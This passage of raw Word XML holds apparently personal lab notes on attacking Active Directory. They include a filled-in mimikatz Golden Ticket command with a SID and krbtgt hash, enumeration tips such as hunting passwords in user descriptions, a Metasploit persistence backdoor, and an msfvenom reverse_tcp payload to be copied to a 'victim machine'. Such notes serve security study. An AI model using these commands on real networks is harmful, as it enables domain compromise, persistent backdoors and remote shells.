      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>golden /user: /domain: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>: /id:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E63F8F" w14:textId="553CCE5B" w:rsidR="003D5BB3" w:rsidRPr="0084205E" w:rsidRDefault="003D5BB3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Kerberos::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>golden /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>user:Administrator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>domain:controller.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /sid:S-1-5-21-849420856-2351964222-986696166 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>: 5508500012cc005cf7082a9a89ebdfdf /</w:t>
      </w:r>
      <w:r w:rsidR="00F30750" w:rsidRPr="0084205E">
        <w:t>id:500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C54EB4" w14:textId="57B9B265" w:rsidR="00F30750" w:rsidRPr="0084205E" w:rsidRDefault="00F30750" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FDA45C" w14:textId="5F0E5E0D" w:rsidR="00F30750" w:rsidRPr="0084205E" w:rsidRDefault="00F30750" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use the Golden Ticket to Access Other Machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF348FE" w14:textId="10B2C222" w:rsidR="00F30750" w:rsidRPr="0084205E" w:rsidRDefault="00F30750" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34CE3E56" w14:textId="018C6DA8" w:rsidR="00F30750" w:rsidRPr="0084205E" w:rsidRDefault="00F30750" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Patch OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0357662E" w14:textId="12ACFA2C" w:rsidR="00F30750" w:rsidRPr="0084205E" w:rsidRDefault="00F30750" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ctrl+C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="110627F4" w14:textId="2AD95B2C" w:rsidR="00F30750" w:rsidRPr="0084205E" w:rsidRDefault="00F30750" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>shell created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8B82FE" w14:textId="0C637602" w:rsidR="00F30750" w:rsidRPr="0084205E" w:rsidRDefault="00F30750" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumeration with Server Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DE506D" w14:textId="44DF5157" w:rsidR="00F30750" w:rsidRPr="0084205E" w:rsidRDefault="009D4415" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>using built in windows features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464059F6" w14:textId="6805A4F2" w:rsidR="009D4415" w:rsidRPr="0084205E" w:rsidRDefault="009D4415" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>server manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B95B68D" w14:textId="59495AAE" w:rsidR="009D4415" w:rsidRPr="0084205E" w:rsidRDefault="009D4415" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>if domain admin access attained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2897EE" w14:textId="04FCD15C" w:rsidR="009D4415" w:rsidRPr="0084205E" w:rsidRDefault="009D4415" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">change trusts, add or remove users, look at groups, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71F8628D" w14:textId="1684FB63" w:rsidR="009D4415" w:rsidRPr="0084205E" w:rsidRDefault="009D4415" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>entry point to find other users with other sensitive information on machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ACCB67" w14:textId="4A5E4A39" w:rsidR="009D4415" w:rsidRPr="0084205E" w:rsidRDefault="009D4415" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>pivoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E525250" w14:textId="6777683B" w:rsidR="009D4415" w:rsidRPr="0084205E" w:rsidRDefault="009D4415" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">only way to access is to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> into server and access server over </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE67F7D" w14:textId="5FE393DB" w:rsidR="009D4415" w:rsidRPr="0084205E" w:rsidRDefault="009D4415" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Connect with RDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AC2D86" w14:textId="5B5FAFED" w:rsidR="009D4415" w:rsidRPr="0084205E" w:rsidRDefault="009D4415" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumeration with Server Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ED0732" w14:textId="6957BF3E" w:rsidR="009D4415" w:rsidRPr="0084205E" w:rsidRDefault="00070AA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Remmina</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6650A8C7" w14:textId="6C1B42D9" w:rsidR="00070AA4" w:rsidRPr="0084205E" w:rsidRDefault="00070AA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE07331" w14:textId="78E26BC0" w:rsidR="00070AA4" w:rsidRPr="0084205E" w:rsidRDefault="00070AA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Windows Server Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214CA82D" w14:textId="7CAAA77E" w:rsidR="00070AA4" w:rsidRPr="0084205E" w:rsidRDefault="00070AA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Tools Tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E89777" w14:textId="48331585" w:rsidR="00070AA4" w:rsidRPr="0084205E" w:rsidRDefault="00070AA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>info such as users, groups, trusts, computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACD7478" w14:textId="36D2C36B" w:rsidR="00070AA4" w:rsidRPr="0084205E" w:rsidRDefault="00070AA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Active Directory Users and Computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9FA7A7" w14:textId="0F42F721" w:rsidR="00070AA4" w:rsidRPr="0084205E" w:rsidRDefault="00070AA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>list of users on domain as well as groups and computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170F7765" w14:textId="5DEBCE6C" w:rsidR="00070AA4" w:rsidRPr="0084205E" w:rsidRDefault="00070AA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>check descriptions for passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549B69B8" w14:textId="14E518AD" w:rsidR="00070AA4" w:rsidRPr="0084205E" w:rsidRDefault="00070AA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Manage Tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F064B0" w14:textId="6811F884" w:rsidR="00070AA4" w:rsidRPr="0084205E" w:rsidRDefault="00070AA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>allow to add roles and features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1477BB85" w14:textId="3A5ADC14" w:rsidR="00070AA4" w:rsidRPr="0084205E" w:rsidRDefault="00070AA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>easily detectable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB9B2BF" w14:textId="077741D3" w:rsidR="00070AA4" w:rsidRPr="0084205E" w:rsidRDefault="00070AA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Maintaining Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0524F67A" w14:textId="1E924991" w:rsidR="00070AA4" w:rsidRPr="0084205E" w:rsidRDefault="002045E6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1D080E" w14:textId="73433998" w:rsidR="002045E6" w:rsidRPr="0084205E" w:rsidRDefault="002045E6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>persistence Metasploit module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75056E55" w14:textId="454DE9A9" w:rsidR="002045E6" w:rsidRPr="0084205E" w:rsidRDefault="002045E6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>backdoor service in system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5909DD79" w14:textId="3ABA801D" w:rsidR="002045E6" w:rsidRPr="0084205E" w:rsidRDefault="002045E6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">give instant </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> shell if machine is ever shutdown or reset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD1B4ED" w14:textId="1C1DEDC2" w:rsidR="002045E6" w:rsidRPr="0084205E" w:rsidRDefault="002045E6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Generating a Payload with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4336EB17" w14:textId="4DD4F737" w:rsidR="002045E6" w:rsidRPr="0084205E" w:rsidRDefault="002045E6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> LHOST= LPORT= -f exe -o shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1CC9AD" w14:textId="4984B5EF" w:rsidR="002045E6" w:rsidRPr="0084205E" w:rsidRDefault="002045E6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">generates basic windows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034479E7" w14:textId="432F7A29" w:rsidR="002045E6" w:rsidRPr="0084205E" w:rsidRDefault="002045E6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">transfer to victim machine using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F6E3F81" w14:textId="691C9069" w:rsidR="002045E6" w:rsidRPr="0084205E" w:rsidRDefault="00CB3CDD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;file&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>remote_username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>@&lt;ip&gt;:/remote/directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DCFA98" w14:textId="16C2EE01" w:rsidR="00CB3CDD" w:rsidRPr="0084205E" w:rsidRDefault="00CB3CDD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F314FD7" w14:textId="258B4D71" w:rsidR="00CB3CDD" w:rsidRPr="0084205E" w:rsidRDefault="00CB3CDD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
